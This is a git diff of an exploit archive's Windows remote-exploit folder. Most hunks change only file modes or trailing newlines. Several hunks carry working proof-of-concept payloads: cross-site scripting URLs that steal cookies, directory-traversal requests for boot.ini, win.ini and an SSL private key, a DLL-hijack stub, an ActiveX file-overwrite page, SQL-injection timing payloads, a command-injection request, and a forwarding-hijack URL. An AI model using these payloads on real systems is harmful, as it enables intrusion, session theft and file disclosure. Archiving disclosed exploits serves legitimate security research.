-http://www.example.com/DServe/dserve.exe?&amp;amp;dsqIni=Dserve.ini&amp;amp;dsqApp=Archive&amp;amp;dsqCmd=OverSort.tcl&amp;amp;dsqDb=Catalog&amp;amp;dsqField=&lt;script&gt;alert(1)&lt;/script&gt;&amp;amp;dsqSearch=*&amp;amp;dsqNum=10 \ No newline at end of file +http://www.example.com/DServe/dserve.exe?&amp;amp;dsqIni=Dserve.ini&amp;amp;dsqApp=Archive&amp;amp;dsqCmd=OverSort.tcl&amp;amp;dsqDb=Catalog&amp;amp;dsqField=&lt;script&gt;alert(1)&lt;/script&gt;&amp;amp;dsqSearch=*&amp;amp;dsqNum=10 \ No newline at end of file diff --git a/platforms/windows/remote/35001.txt b/platforms/windows/remote/35001.txt old mode 100755 new mode 100644 index 04ac013d2..427ba138c --- a/platforms/windows/remote/35001.txt +++ b/platforms/windows/remote/35001.txt @@ -9,4 +9,4 @@ http://www.example.com:50100/OpenSQLMonitors/servlet/ConnectionMonitorServlet?vi =com.sap.sql.jdbc.direct.DirectPooledConnection@1ed00a7<script>alert(document.cookie)</script> http://www.example.com:50100/OpenSQLMonitors/servlet/CatalogBufferMonitorServlet?action=btnSHOW_COLUMNS&reqNode=12924950&reqBufferId= -SAPSERVER:dm0:SAPSR3DB&reqTableColumns=BC_RPROF_PROFILE<script>alert(document.cookie)</script> \ No newline at end of file +SAPSERVER:dm0:SAPSR3DB&reqTableColumns=BC_RPROF_PROFILE<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/windows/remote/35002.html b/platforms/windows/remote/35002.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35005.html b/platforms/windows/remote/35005.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35006.html b/platforms/windows/remote/35006.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35007.c b/platforms/windows/remote/35007.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35051.txt b/platforms/windows/remote/35051.txt old mode 100755 new mode 100644 index 97fc07b88..ccdf8ed91 --- a/platforms/windows/remote/35051.txt +++ b/platforms/windows/remote/35051.txt @@ -4,4 +4,4 @@ Freefloat FTP Server is prone to a directory-traversal vulnerability because it Exploiting this issue can allow an attacker to retrieve arbitrary files outside of the FTP server root directory. This may aid in further attacks. -GET ../../boot.ini \ No newline at end of file +GET ../../boot.ini \ No newline at end of file diff --git a/platforms/windows/remote/35119.txt b/platforms/windows/remote/35119.txt old mode 100755 new mode 100644 index 8b26a57b5..e52066e44 --- a/platforms/windows/remote/35119.txt +++ b/platforms/windows/remote/35119.txt @@ -11,4 +11,4 @@ U-Mail 9.8 for Windows U-Mail GateWay 9.8 for Windows http://www.example.com/login.wdm%20 -http://www.example.com/login.wdm%2e \ No newline at end of file +http://www.example.com/login.wdm%2e \ No newline at end of file diff --git a/platforms/windows/remote/35130.txt b/platforms/windows/remote/35130.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35166.c b/platforms/windows/remote/35166.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35171.c b/platforms/windows/remote/35171.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35190.html b/platforms/windows/remote/35190.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35225.c b/platforms/windows/remote/35225.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35229.html b/platforms/windows/remote/35229.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35273.html b/platforms/windows/remote/35273.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35280.txt b/platforms/windows/remote/35280.txt old mode 100755 new mode 100644 index 639fdc08e..60c015cd9 --- a/platforms/windows/remote/35280.txt +++ b/platforms/windows/remote/35280.txt @@ -75,4 +75,4 @@ For this to work the remoting service must be running with full typefilter mode (which is some, especially IPC services). It also only works with the commands ls, put and get. But that should be enough to compromise a box. -I've provided an example service to test against. \ No newline at end of file +I've provided an example service to test against. \ No newline at end of file diff --git a/platforms/windows/remote/35308.html b/platforms/windows/remote/35308.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35318.c b/platforms/windows/remote/35318.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35434.txt b/platforms/windows/remote/35434.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3544.c b/platforms/windows/remote/3544.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35560.txt b/platforms/windows/remote/35560.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35573.txt b/platforms/windows/remote/35573.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35614.c b/platforms/windows/remote/35614.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35694.txt b/platforms/windows/remote/35694.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3570.c b/platforms/windows/remote/3570.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35740.txt b/platforms/windows/remote/35740.txt old mode 100755 new mode 100644 index bac34963f..0cc0da2b2 --- a/platforms/windows/remote/35740.txt +++ b/platforms/windows/remote/35740.txt @@ -4,4 +4,4 @@ The Microsoft .NET Framework is prone to a remote code-execution vulnerability t Successful exploits may allow an attacker to execute arbitrary code in the context of the browser; this may aid in further attacks. -if ((value == null || value == new string[0]) == false) \ No newline at end of file +if ((value == null || value == new string[0]) == false) \ No newline at end of file diff --git a/platforms/windows/remote/3575.cpp b/platforms/windows/remote/3575.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3577.html b/platforms/windows/remote/3577.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35806.c b/platforms/windows/remote/35806.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35809.c b/platforms/windows/remote/35809.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35822.html b/platforms/windows/remote/35822.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35864.txt b/platforms/windows/remote/35864.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35880.html b/platforms/windows/remote/35880.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35881.c b/platforms/windows/remote/35881.c old mode 100755 new mode 100644 index 5371df8a9..4371cb033 --- a/platforms/windows/remote/35881.c +++ b/platforms/windows/remote/35881.c @@ -1,9 +1,9 @@ +/* source: http://www.securityfocus.com/bid/48432/info xAurora is prone to a vulnerability that lets attackers execute arbitrary code. An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. - */ #include <windows.h> diff --git a/platforms/windows/remote/35885.txt b/platforms/windows/remote/35885.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35886.txt b/platforms/windows/remote/35886.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3589.pm b/platforms/windows/remote/3589.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35897.html b/platforms/windows/remote/35897.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35921.html b/platforms/windows/remote/35921.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35928.html b/platforms/windows/remote/35928.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35948.html b/platforms/windows/remote/35948.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/35949.txt b/platforms/windows/remote/35949.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36.c b/platforms/windows/remote/36.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36020.txt b/platforms/windows/remote/36020.txt old mode 100755 new mode 100644 index 000c33bec..2f25b88c1 --- a/platforms/windows/remote/36020.txt +++ b/platforms/windows/remote/36020.txt @@ -4,4 +4,4 @@ Microsoft Visual Studio is prone to multiple cross-site scripting vulnerability An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to spoof content or disclose sensitive information. -https://www.example.com/Reserved.ReportViewerWebControl.axd?Mode=true&ReportID=%3CarbitraryIDvalue%3E&ControlID=%3CvalidControlID%3E&Culture=1033&UICulture=1033&ReportStack=1&OpType=SessionKeepAlive&TimerMethod=KeepAliveMethodctl00_PlaceHolderMain_SiteTopUsersByHits_ctl00TouchSession0;alert(document.cookie);//&CacheSeed= \ No newline at end of file +https://www.example.com/Reserved.ReportViewerWebControl.axd?Mode=true&ReportID=%3CarbitraryIDvalue%3E&ControlID=%3CvalidControlID%3E&Culture=1033&UICulture=1033&ReportStack=1&OpType=SessionKeepAlive&TimerMethod=KeepAliveMethodctl00_PlaceHolderMain_SiteTopUsersByHits_ctl00TouchSession0;alert(document.cookie);//&CacheSeed= \ No newline at end of file diff --git a/platforms/windows/remote/36049.html b/platforms/windows/remote/36049.html old mode 100755 new mode 100644 index 1b1f094a5..d3f24c21b --- a/platforms/windows/remote/36049.html +++ b/platforms/windows/remote/36049.html @@ -6,4 +6,4 @@ Attackers can overwrite arbitrary files on the victim's computer in the context StudioLine Photo Basic 3.70.34.0 is vulnerable; other versions may also be affected. -<html> <object classid='clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="FilePath\File_name_to_corrupt_or_create" arg2=True target.EnableLog arg1 ,arg2 End Sub </script> </html> \ No newline at end of file +<html> <object classid='clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="FilePath\File_name_to_corrupt_or_create" arg2=True target.EnableLog arg1 ,arg2 End Sub </script> </html> \ No newline at end of file diff --git a/platforms/windows/remote/361.txt b/platforms/windows/remote/361.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3610.html b/platforms/windows/remote/3610.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36115.txt b/platforms/windows/remote/36115.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36174.txt b/platforms/windows/remote/36174.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36209.html b/platforms/windows/remote/36209.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36217.txt b/platforms/windows/remote/36217.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36218.txt b/platforms/windows/remote/36218.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36219.txt b/platforms/windows/remote/36219.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36235.txt b/platforms/windows/remote/36235.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36250.html b/platforms/windows/remote/36250.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36258.txt b/platforms/windows/remote/36258.txt old mode 100755 new mode 100644 index f41e8e0d4..bb4598524 --- a/platforms/windows/remote/36258.txt +++ b/platforms/windows/remote/36258.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues affect XAMPP 1.7.4 for Windows and prior. http://www.example.com/xampp/ming.php?text=[xss] -http://www.example.com/xampp/cds.php/[xss] \ No newline at end of file +http://www.example.com/xampp/cds.php/[xss] \ No newline at end of file diff --git a/platforms/windows/remote/3627.c b/platforms/windows/remote/3627.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36291.txt b/platforms/windows/remote/36291.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36318.txt b/platforms/windows/remote/36318.txt old mode 100755 new mode 100644 index 9776238df..e005bfdb0 --- a/platforms/windows/remote/36318.txt +++ b/platforms/windows/remote/36318.txt @@ -4,4 +4,4 @@ Jetty Web Server is prone to a directory-traversal vulnerability because it fail Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks. -http://www.example.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key \ No newline at end of file +http://www.example.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key \ No newline at end of file diff --git a/platforms/windows/remote/36319.txt b/platforms/windows/remote/36319.txt old mode 100755 new mode 100644 index 1e774aca5..427feb7c2 --- a/platforms/windows/remote/36319.txt +++ b/platforms/windows/remote/36319.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br GoAhead WebServer 2.5 is vulnerable; other versions may also be affected. -http://www.example.com/goform/formTest?name=%3Cscript%3Ealert(4321)%3C/script%3E&address=%3Cscript%3Ealert(1234)%3C/script%3E \ No newline at end of file +http://www.example.com/goform/formTest?name=%3Cscript%3Ealert(4321)%3C/script%3E&address=%3Cscript%3Ealert(1234)%3C/script%3E \ No newline at end of file diff --git a/platforms/windows/remote/3634.txt b/platforms/windows/remote/3634.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3635.txt b/platforms/windows/remote/3635.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3636.txt b/platforms/windows/remote/3636.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36376.txt b/platforms/windows/remote/36376.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36491.txt b/platforms/windows/remote/36491.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3650.c b/platforms/windows/remote/3650.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36500.txt b/platforms/windows/remote/36500.txt old mode 100755 new mode 100644 index 95dfcb84b..65d4f04f7 --- a/platforms/windows/remote/36500.txt +++ b/platforms/windows/remote/36500.txt @@ -9,4 +9,4 @@ HServer 0.1.1 is vulnerable; other versions may also be affected. http://www.example.com/..%5c..%5c..%5cboot.ini http://www.example.com/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdr ivers%5cetc%5chosts \ No newline at end of file +http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdr ivers%5cetc%5chosts \ No newline at end of file diff --git a/platforms/windows/remote/36505.txt b/platforms/windows/remote/36505.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36507.txt b/platforms/windows/remote/36507.txt old mode 100755 new mode 100644 index 87abab8b1..bbcc8b7f8 --- a/platforms/windows/remote/36507.txt +++ b/platforms/windows/remote/36507.txt @@ -8,4 +8,4 @@ Microsoft Anti-Cross Site Scripting Library 3.x and 4.0 are vulnerable. string data = Microsoft.Security.Application.Sanitizer.GetSafeHtml("a<style><!--div{font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'}--></style><div>b</div>"); -string data = Microsoft.Security.Application.Sanitizer.GetSafeHtmlFragment("<div style="">aaa</div>") \ No newline at end of file +string data = Microsoft.Security.Application.Sanitizer.GetSafeHtmlFragment("<div style="">aaa</div>") \ No newline at end of file diff --git a/platforms/windows/remote/3651.txt b/platforms/windows/remote/3651.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36513.txt b/platforms/windows/remote/36513.txt old mode 100755 new mode 100644 index a6946b6b8..1e7779710 --- a/platforms/windows/remote/36513.txt +++ b/platforms/windows/remote/36513.txt @@ -9,4 +9,4 @@ IpTools Tiny TCP/IP servers 0.1.4 is vulnerable; other versions may also be affe http://www.example.com/..\..\boot.ini http://www.example.com/../../boot.ini http://www.example.com/..\..\windows\system32\drivers\etc\hosts -http://www.example.com/../../windows/system32/drivers/etc/hosts \ No newline at end of file +http://www.example.com/../../windows/system32/drivers/etc/hosts \ No newline at end of file diff --git a/platforms/windows/remote/36517.html b/platforms/windows/remote/36517.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36518.html b/platforms/windows/remote/36518.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36519.html b/platforms/windows/remote/36519.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36542.txt b/platforms/windows/remote/36542.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36546.txt b/platforms/windows/remote/36546.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36602.html b/platforms/windows/remote/36602.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36603.html b/platforms/windows/remote/36603.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36604.html b/platforms/windows/remote/36604.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36606.html b/platforms/windows/remote/36606.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36607.html b/platforms/windows/remote/36607.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36756.html b/platforms/windows/remote/36756.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36829.txt b/platforms/windows/remote/36829.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/36915.txt b/platforms/windows/remote/36915.txt old mode 100755 new mode 100644 index bee6e869a..483c993a7 --- a/platforms/windows/remote/36915.txt +++ b/platforms/windows/remote/36915.txt @@ -7,4 +7,4 @@ Exploiting the issues can allow an attacker to obtain sensitive information that NetDecision 4.6.1 is vulnerable; other versions may also be affected. http://www.example.com:8087/...\...\...\...\...\...\windows\system.ini -http://www.example.com:8090/.../.../.../.../.../.../windows/system.ini \ No newline at end of file +http://www.example.com:8090/.../.../.../.../.../.../windows/system.ini \ No newline at end of file diff --git a/platforms/windows/remote/37020.html b/platforms/windows/remote/37020.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3728.c b/platforms/windows/remote/3728.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3738.php b/platforms/windows/remote/3738.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/37396.txt b/platforms/windows/remote/37396.txt old mode 100755 new mode 100644 index d2f059cbd..b54417189 --- a/platforms/windows/remote/37396.txt +++ b/platforms/windows/remote/37396.txt @@ -8,4 +8,4 @@ http://www.example.com/xampp/perlinfo.pl/"<script>alert("XSS")</script> http://www.example.com/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E -http://www.example.com/xampp/cds.php?interpret=1&jahr=1967 and sleep(1) &titel=555-666-0606 \ No newline at end of file +http://www.example.com/xampp/cds.php?interpret=1&jahr=1967 and sleep(1) &titel=555-666-0606 \ No newline at end of file diff --git a/platforms/windows/remote/3740.c b/platforms/windows/remote/3740.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/37400.php b/platforms/windows/remote/37400.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3746.txt b/platforms/windows/remote/3746.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/37510.c b/platforms/windows/remote/37510.c old mode 100755 new mode 100644 index ca277dca8..b36d2f8df --- a/platforms/windows/remote/37510.c +++ b/platforms/windows/remote/37510.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/54477/info Google Chrome is prone to a vulnerability that lets attackers execute arbitrary code. @@ -7,20 +8,20 @@ An attacker can exploit this issue by enticing a legitimate user to use the vuln Google Chrome 19.0.1084.21 through versions 20.0.1132.23 are vulnerable. Note: This issue was previously discussed in BID 54203 (Google Chrome Prior to 20.0.1132.43 Multiple Security Vulnerabilities), but has been given its own record to better document it. +*/ - #include <windows.h> +#include <windows.h> +int hijack_poc () +{ + WinExec ( "calc.exe" , SW_NORMAL ); + return 0 ; +} - int hijack_poc () - { - WinExec ( "calc.exe" , SW_NORMAL ); - return 0 ; - } - - BOOL WINAPI DllMain - ( HINSTANCE hinstDLL , - DWORD dwReason , - LPVOID lpvReserved ) - { - hijack_poc () ; - return 0 ; - } \ No newline at end of file +BOOL WINAPI DllMain + ( HINSTANCE hinstDLL , + DWORD dwReason , + LPVOID lpvReserved ) +{ + hijack_poc () ; + return 0 ; +} \ No newline at end of file diff --git a/platforms/windows/remote/37542.html b/platforms/windows/remote/37542.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/37611.php b/platforms/windows/remote/37611.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/37655.c b/platforms/windows/remote/37655.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/37668.php b/platforms/windows/remote/37668.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/37800.php b/platforms/windows/remote/37800.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/37840.txt b/platforms/windows/remote/37840.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/37841.txt b/platforms/windows/remote/37841.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/37842.txt b/platforms/windows/remote/37842.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/37996.txt b/platforms/windows/remote/37996.txt old mode 100755 new mode 100644 index 7274960c9..239e8e9ff --- a/platforms/windows/remote/37996.txt +++ b/platforms/windows/remote/37996.txt @@ -6,4 +6,4 @@ A remote attacker could exploit this vulnerability using directory-traversal str http://www.example.com/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini -http://www.example.com/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini \ No newline at end of file +http://www.example.com/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini \ No newline at end of file diff --git a/platforms/windows/remote/38005.asp b/platforms/windows/remote/38005.asp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3804.txt b/platforms/windows/remote/3804.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3808.html b/platforms/windows/remote/3808.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3810.html b/platforms/windows/remote/3810.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/38206.html b/platforms/windows/remote/38206.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/38227.txt b/platforms/windows/remote/38227.txt old mode 100755 new mode 100644 index 5f6524c33..a153a13a6 --- a/platforms/windows/remote/38227.txt +++ b/platforms/windows/remote/38227.txt @@ -17,4 +17,4 @@ commandtoRun = "C:\\Windows\\notepad.exe";oShell.ShellExecute(commandtoRun,"","","open","1");-" Host: meet.domainname.com Connection: Keep-Alive -Cookie: LOCO=yes; icscontext=cnet; ProfileNameCookie=example \ No newline at end of file +Cookie: LOCO=yes; icscontext=cnet; ProfileNameCookie=example \ No newline at end of file diff --git a/platforms/windows/remote/38260.php b/platforms/windows/remote/38260.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/38325.txt b/platforms/windows/remote/38325.txt old mode 100755 new mode 100644 index 6b5a70313..af8203d86 --- a/platforms/windows/remote/38325.txt +++ b/platforms/windows/remote/38325.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow a remote attacker to perform certain unauthorize http://www.example.com/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&Password=Letme1n&ConfirmPassword=Letme1n -http://www.example.com/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&ForwardingEnabled=Yes&ForwardingRetainCopy=Yes&ForwardingAddress=hacker%40example.com \ No newline at end of file +http://www.example.com/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&ForwardingEnabled=Yes&ForwardingRetainCopy=Yes&ForwardingAddress=hacker%40example.com \ No newline at end of file diff --git a/platforms/windows/remote/38330.txt b/platforms/windows/remote/38330.txt old mode 100755 new mode 100644 index 664d597cc..21d1091f0 --- a/platforms/windows/remote/38330.txt +++ b/platforms/windows/remote/38330.txt @@ -16,4 +16,4 @@ BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved) MessageBox(0,"DLL Injection","DLL Injection", 0); } return TRUE; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/remote/38384.txt b/platforms/windows/remote/38384.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/38388.txt b/platforms/windows/remote/38388.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3844.html b/platforms/windows/remote/3844.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/38500.php b/platforms/windows/remote/38500.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/38512.php b/platforms/windows/remote/38512.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/38513.txt b/platforms/windows/remote/38513.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/38644.txt b/platforms/windows/remote/38644.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/38694.txt b/platforms/windows/remote/38694.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3872.html b/platforms/windows/remote/3872.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/38742.txt b/platforms/windows/remote/38742.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3877.html b/platforms/windows/remote/3877.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3880.html b/platforms/windows/remote/3880.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3881.html b/platforms/windows/remote/3881.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3882.html b/platforms/windows/remote/3882.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/38910.txt b/platforms/windows/remote/38910.txt old mode 100755 new mode 100644 index 530eb3f21..d463964d9 --- a/platforms/windows/remote/38910.txt +++ b/platforms/windows/remote/38910.txt @@ -8,4 +8,4 @@ Successful exploits will result in the execution of arbitrary code in the contex Hancom Office 2010 SE 8.5.8 is vulnerable; Other versions may also be affected. -<TEXTART Text="AAAAAAAA...(more than 500 bytes)" X0="0" X1="14173" X2="14173" X3="0" Y0="0" Y1="0" Y2="14173" Y3="14173"> \ No newline at end of file +<TEXTART Text="AAAAAAAA...(more than 500 bytes)" X0="0" X1="14173" X2="14173" X3="0" Y0="0" Y1="0" Y2="14173" Y3="14173"> \ No newline at end of file diff --git a/platforms/windows/remote/38911.txt b/platforms/windows/remote/38911.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/38912.txt b/platforms/windows/remote/38912.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/38918.txt b/platforms/windows/remote/38918.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3892.html b/platforms/windows/remote/3892.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/38923.txt b/platforms/windows/remote/38923.txt old mode 100755 new mode 100644 index 4bfba8f43..713284f7f --- a/platforms/windows/remote/38923.txt +++ b/platforms/windows/remote/38923.txt @@ -4,4 +4,4 @@ Apple Safari for Windows is affected by a security-bypass weakness. Successfully exploiting this issue may allow an attacker to bypass certain security warnings. This may aid in conducting phishing attacks. -http://example.com:/@/xsser.me/ \ No newline at end of file +http://example.com:/@/xsser.me/ \ No newline at end of file diff --git a/platforms/windows/remote/3893.c b/platforms/windows/remote/3893.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/38968.txt b/platforms/windows/remote/38968.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3899.html b/platforms/windows/remote/3899.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3913.c b/platforms/windows/remote/3913.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3916.php b/platforms/windows/remote/3916.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/39161.py b/platforms/windows/remote/39161.py index 3ab9bc5a5..aa7d9a07b 100755 --- a/platforms/windows/remote/39161.py +++ b/platforms/windows/remote/39161.py @@ -46,5 +46,4 @@ try: except: print """[.]Something went wrong..! Usage is :[.] python exploit.py <Target IP address> <Target Port Number> - Don't forgot to change the Local IP address and Port number on the script""" - \ No newline at end of file + Don't forgot to change the Local IP address and Port number on the script""" \ No newline at end of file diff --git a/platforms/windows/remote/39218.html b/platforms/windows/remote/39218.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3927.html b/platforms/windows/remote/3927.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3938.html b/platforms/windows/remote/3938.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3950.html b/platforms/windows/remote/3950.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3951.html b/platforms/windows/remote/3951.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3952.html b/platforms/windows/remote/3952.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/39599.txt b/platforms/windows/remote/39599.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3961.html b/platforms/windows/remote/3961.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3966.php b/platforms/windows/remote/3966.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3967.html b/platforms/windows/remote/3967.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3968.html b/platforms/windows/remote/3968.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/39698.html b/platforms/windows/remote/39698.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/39805.txt b/platforms/windows/remote/39805.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3982.html b/platforms/windows/remote/3982.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3984.html b/platforms/windows/remote/3984.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3993.html b/platforms/windows/remote/3993.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3996.c b/platforms/windows/remote/3996.c old mode 100755 new mode 100644 diff --git 